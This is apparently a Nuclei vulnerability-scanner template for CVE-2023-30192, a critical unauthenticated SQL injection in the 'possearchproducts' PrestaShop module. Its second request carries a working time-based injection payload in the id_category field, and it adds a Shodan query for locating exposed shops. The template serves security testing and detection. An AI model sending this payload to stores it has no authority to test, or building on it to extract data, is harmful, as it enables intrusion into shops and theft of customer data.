id: CVE-2023-30192 info: name: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection author: mastercho severity: critical description: | In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-30192 - https://security.friendsofpresta.org/modules/2023/05/11/possearchproducts.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30192 cwe-id: CWE-89 epss-score: 0.02678 epss-percentile: 0.84216 metadata: verified: true max-request: 2 product: possearchproducts framework: prestashop shodan-query: http.component:"prestashop" tags: cve,cve2023,prestashop,sqli,time-based-sqli,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: dsl dsl: - 'contains_any(tolower(response), "prestashop", "possearchproducts")' internal: true - raw: - | @timeout: 20s POST /modules/possearchproducts/SearchProducts.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded id_category=10*if(now()=sysdate()%2Csleep(6)%2C0)&id_lang=3&resultsPerPage=10&s=the matchers: - type: dsl dsl: - 'duration>=6' - 'contains(tolower(response), "products")' - 'status_code != 404' condition: and # digest: 4a0a0047304502200503632fc4fd0bbaff214fdb91c5ee72fa49f902316120631eec0f19653402e2022100ef78f99bf3e9d4f7775c66bc754fc577da013ef5b5de9d795d1b413bd566fc17:922c64590222798bb761d5b6d8e72950